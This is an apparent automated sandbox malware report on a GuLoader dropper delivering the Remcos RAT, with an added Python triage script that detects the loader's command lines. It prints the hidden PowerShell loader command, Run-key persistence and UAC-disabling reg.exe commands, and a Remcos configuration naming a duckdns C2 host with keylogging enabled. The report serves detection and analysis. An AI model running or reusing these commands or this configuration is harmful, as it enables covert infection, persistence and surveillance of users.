Windows Analysis Report
anziOUzZJs.exe

Overview

General Information

Sample name: anziOUzZJs.exe (renamed because the original name is a hash value)
Original sample name: 39f1703e13bdc112f4ffe9240f70cd5eb5b07cc218e6b22a8d58e4dcfaadd0a1.exe
Analysis ID: 1502984
MD5: 61bdbe7854f1572202f7916cf7f03616
SHA1: e03a3385bc0cd5869c2a8cc72c80f4115b7b7945
SHA256: 39f1703e13bdc112f4ffe9240f70cd5eb5b07cc218e6b22a8d58e4dcfaadd0a1
Tags: exe, GuLoader

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Remcos RAT
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Disables UAC (registry)
Drops PE files with a suspicious file extension
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Powershell drops PE file
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Uses cmd line tools excessively to alter registry or file data
Uses dynamic DNS services
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE / OLE file has an invalid certificate
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: Use Short Name Path in Command Line
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • anziOUzZJs.exe (PID: 7248 cmdline: "C:\Users\user\Desktop\anziOUzZJs.exe" MD5: 61BDBE7854F1572202F7916CF7F03616)
    • powershell.exe (PID: 7800 cmdline: "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7812 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preferentialist" /t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 7264 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preferentialist" /t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • cmd.exe (PID: 1056 cmdline: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 4308 cmdline: C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • WerFault.exe (PID: 5192 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7800 -s 3448 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 6108 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7800 -s 2384 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 2176 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
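The process tree above carries the whole infection chain in three command lines: a hidden PowerShell that reads Ruralt.Tea, slices a three-character command name out of it at offset 69838 and dot-invokes that name on the file contents; a reg.exe call that plants a REG_EXPAND_SZ Run value whose %Therapeutic% variable and HKCU\Corycia\mandskaber property are not standard Windows objects; and a second reg.exe call that sets EnableLUA to 0. The following is an added example and not part of the Joe Sandbox report: a small Python triage script that runs those three checks over the command lines (copied from the tree above into a constructed list) and shows how the SubString offset resolves against a file. The rule names, the KNOWN_ENV allowlist and the stand-in file content are the example's own assumptions; the real Ruralt.Tea is not on this page, so the "iex" in the stand-in is illustrative, not a recovered value.

```python
import re
from dataclasses import dataclass, field

# Process command lines copied from the report's process tree. The list itself is
# constructed input for this example, not a log export from the sandbox.
SAMPLE_EVENTS = [
    (7800, "powershell.exe",
     '"powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content '
     "'C:\\Users\\user~1\\AppData\\Local\\Temp\\Servicebureauet\\aloe\\Ruralt.Tea';"
     "$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);"
     '.$Advokatfuldmgtigs($Mitokoromono)"'),
    (7264, "reg.exe",
     'REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /f /v "Preferentialist" '
     '/t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized '
     "$Terrain=(Get-ItemProperty -Path 'HKCU:\\Corycia\\').mandskaber;"
     '%Therapeutic% ($Terrain)"'),
    (4308, "reg.exe",
     "C:\\Windows\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion"
     "\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f"),
    (2176, "svchost.exe", "C:\\Windows\\System32\\svchost.exe -k netsvcs -p -s BITS"),
]

# Loader stage: read a data file, slice a short token out of it and dot-invoke the
# token as a command, so the cmdlet name never appears on the command line.
FILE_SLICE_INVOKE = re.compile(
    r"Get-Content\s+'(?P<path>[^']+)'.*?\.SubString\((?P<off>\d+),\s*(?P<len>\d+)\).*?\.\$\w+\(",
    re.IGNORECASE | re.DOTALL)
# Persistence stage: reg.exe ADD into a Run key, plus the pieces of the value it writes.
RUN_KEY_ADD = re.compile(r'\breg(?:\.exe)?\s+add\s+"?(?P<key>HK\w+\\[^\s"]*\\CurrentVersion\\Run)\b',
                         re.IGNORECASE)
REG_VALUE = re.compile(r'/v\s+"?(?P<name>[^"\s]+)"?', re.IGNORECASE)
REG_TYPE = re.compile(r"/t\s+(?P<type>REG_\w+)", re.IGNORECASE)
REG_DATA = re.compile(r'/d\s+"(?P<data>.*)"', re.IGNORECASE | re.DOTALL)
ENV_TOKEN = re.compile(r"%([A-Za-z_][A-Za-z0-9_]*)%")
STASH = re.compile(r"Get-ItemProperty\s+-Path\s+'(?P<path>HK\w+:\\[^']*)'\)\.(?P<prop>\w+)")
# Defense evasion stage: EnableLUA forced to 0 under the System policy key.
UAC_DISABLE = re.compile(r"Policies\\System\b.*?/v\s+EnableLUA\b.*?/d\s+0\b", re.IGNORECASE | re.DOTALL)

# Environment variables Windows defines by itself (assumed allowlist); any other name in a
# REG_EXPAND_SZ Run value must have been planted, typically under HKCU\Environment.
KNOWN_ENV = {"SYSTEMROOT", "WINDIR", "SYSTEMDRIVE", "PROGRAMFILES", "PROGRAMDATA", "APPDATA",
             "LOCALAPPDATA", "TEMP", "TMP", "USERPROFILE", "COMSPEC", "PUBLIC", "ALLUSERSPROFILE",
             "HOMEDRIVE", "HOMEPATH", "PATH", "COMMONPROGRAMFILES", "USERNAME", "COMPUTERNAME"}


@dataclass
class Finding:
    pid: int
    image: str
    rule: str
    details: dict = field(default_factory=dict)


def analyse(events):
    """Run the three rules over (pid, image, cmdline) tuples and return the Findings."""
    findings = []
    for pid, image, cmd in events:
        m = FILE_SLICE_INVOKE.search(cmd)
        if m:
            findings.append(Finding(pid, image, "ps_file_slice_invoke", {
                "path": m["path"], "offset": int(m["off"]), "length": int(m["len"]),
                "hidden_window": bool(re.search(r"-windowstyle\s+hidden", cmd, re.I)),
            }))
        m = RUN_KEY_ADD.search(cmd)
        if m:
            d = {"key": m["key"]}
            v, t, data = REG_VALUE.search(cmd), REG_TYPE.search(cmd), REG_DATA.search(cmd)
            d["value_name"] = v["name"] if v else None
            d["value_type"] = t["type"] if t else None
            if data:
                text = data["data"]
                # %VAR% tokens that Windows does not define and a registry stash the value reads
                d["undefined_env_vars"] = sorted({e for e in ENV_TOKEN.findall(text)
                                                  if e.upper() not in KNOWN_ENV})
                s = STASH.search(text)
                d["stash"] = (s["path"], s["prop"]) if s else None
            findings.append(Finding(pid, image, "run_key_persistence", d))
        if UAC_DISABLE.search(cmd):
            findings.append(Finding(pid, image, "uac_disable", {"value": "EnableLUA=0"}))
    return findings


def resolve_slice(cmd, file_text):
    """Apply the SubString(offset, length) taken from a loader command line to the text of
    the file it reads, recovering the command name the loader dot-invokes."""
    m = FILE_SLICE_INVOKE.search(cmd)
    if not m:
        return None
    off, n = int(m["off"]), int(m["len"])
    return file_text[off:off + n]


if __name__ == "__main__":
    for f in analyse(SAMPLE_EVENTS):
        print(f"PID {f.pid} {f.image}: {f.rule} {f.details}")
    # Ruralt.Tea is not on this page; this constructed stand-in only shows how the offset resolves.
    stand_in = "A" * 69838 + "iex" + "B" * 16
    print("token at offset 69838:", resolve_slice(SAMPLE_EVENTS[0][2], stand_in))
```

Get-Content without -Raw returns one string per line, so the .SubString call in the real command only works cleanly if the stager file is a single line; when the actual file is available, feed its content to resolve_slice rather than assuming the alias. The %Therapeutic% variable has to exist in the user's environment for the Run value to expand, so HKCU\Environment is the next place to look on an infected host (an inference from the REG_EXPAND_SZ type, not something the report shows).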
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware configuration (Remcos): {"Host:Port:Password": "PP9.duckdns.org:3256:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-7CSH4D", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Yara matches (Source; Rule; Description; Author):
  • 0000000A.00000002.2009656049.0000000008137000.00000004.00000020.00020000.00000000.sdmp; JoeSecurity_Remcos; Yara detected Remcos RAT; Joe Security
  • 0000000A.00000002.2007087274.00000000070D0000.00000004.00000020.00020000.00000000.sdmp; JoeSecurity_Remcos; Yara detected Remcos RAT; Joe Security
  • 0000000A.00000002.2002199771.0000000002B58000.00000004.00000020.00020000.00000000.sdmp; JoeSecurity_Remcos; Yara detected Remcos RAT; Joe Security
  • Process Memory Space: powershell.exe PID: 7800; JoeSecurity_Remcos; Yara detected Remcos RAT; Joe Security

          System Summary

Source: Process started; Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton; Data: Command: "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)", CommandLine: "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\anziOUzZJs.exe", ParentImage: C:\Users\user\Desktop\anziOUzZJs.exe, ParentProcessId: 7248, ParentProcessName: anziOUzZJs.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)", ProcessId: 7800, ProcessName: powershell.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: %Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7264, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Preferentialist
Source: Process started; Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community; Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preferentialist" /t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preferentialist" /t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preferentialist" /t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7812, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preferentialist" /t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)", ProcessId: 7264, ProcessName: reg.exe
Source: File created; Author: frack113, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7800, TargetFilename: C:\Users\user\AppData\Local\Temp\Partivarerne.scr
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preferentialist" /t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preferentialist" /t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7800, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preferentialist" /t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)", ProcessId: 7812, ProcessName: cmd.exe
Source: File created; Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io; Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7800, TargetFilename: C:\Users\user\AppData\Local\Temp\Partivarerne.scr
Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7800, TargetFilename: C:\Users\user\AppData\Local\Temp\Partivarerne.scr
Source: Process started; Author: frack113, Nasreddine Bencherchali; Data: Command: "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)", CommandLine: "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\anziOUzZJs.exe", ParentImage: C:\Users\user\Desktop\anziOUzZJs.exe, ParentProcessId: 7248, ParentProcessName: anziOUzZJs.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)", ProcessId: 7800, ProcessName: powershell.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)", CommandLine: "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\anziOUzZJs.exe", ParentImage: C:\Users\user\Desktop\anziOUzZJs.exe, ParentProcessId: 7248, ParentProcessName: anziOUzZJs.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)", ProcessId: 7800, ProcessName: powershell.exe
Source: Process started; Author: vburov; Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 2176, ProcessName: svchost.exe

          Stealing of Sensitive Information

Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7800, TargetFilename: C:\ProgramData\remcos\logs.dat

Suricata IDS alert: Timestamp: 2024-09-02T16:20:41.195073+0200; SID: 2803270; Severity: 2; Source Port: 49726; Destination Port: 443; Protocol: TCP; Classtype: Potentially Bad Traffic


          AV Detection

Source: 0000000A.00000002.2007087274.00000000070D0000.00000004.00000020.00020000.00000000.sdmp; Malware Configuration Extractor: Remcos {"Host:Port:Password": "PP9.duckdns.org:3256:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-7CSH4D", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: C:\Users\user\AppData\Local\Temp\Partivarerne.scr; ReversingLabs: Detection: 52%
Source: anziOUzZJs.exe; ReversingLabs: Detection: 52%
Source: Yara match; File source: 0000000A.00000002.2009656049.0000000008137000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.2007087274.00000000070D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.2002199771.0000000002B58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: powershell.exe PID: 7800, type: MEMORYSTR
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 81.8% probability
Source: anziOUzZJs.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown; HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.7:49726 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.7:49729 version: TLS 1.2
Source: anziOUzZJs.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: System.Configuration.Install.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Data.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.DirectoryServices.pdbTzQs source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: tion.pdb source: powershell.exe, 0000000A.00000002.2009656049.000000000816C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.Security.pdbH source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Management.pdbc source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Xml.ni.pdbRSDS# source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Core.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.ServiceProcess.pdb` source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Numerics.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: mscorlib.pdb4X(w source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Transactions.ni.pdbRSDSc source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.DirectoryServices.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.ServiceProcess.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: mscorlib.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Configuration.Install.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.Security.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Xml.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.ni.pdbRSDS source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.DirectoryServices.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Configuration.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: stem.Core.pdb source: powershell.exe, 0000000A.00000002.2009656049.00000000080D0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: Microsoft.PowerShell.Commands.Management.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Xml.pdbMZ@ source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: mscorlib.ni.pdbRSDS source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb4' source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Configuration.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Data.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Xml.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
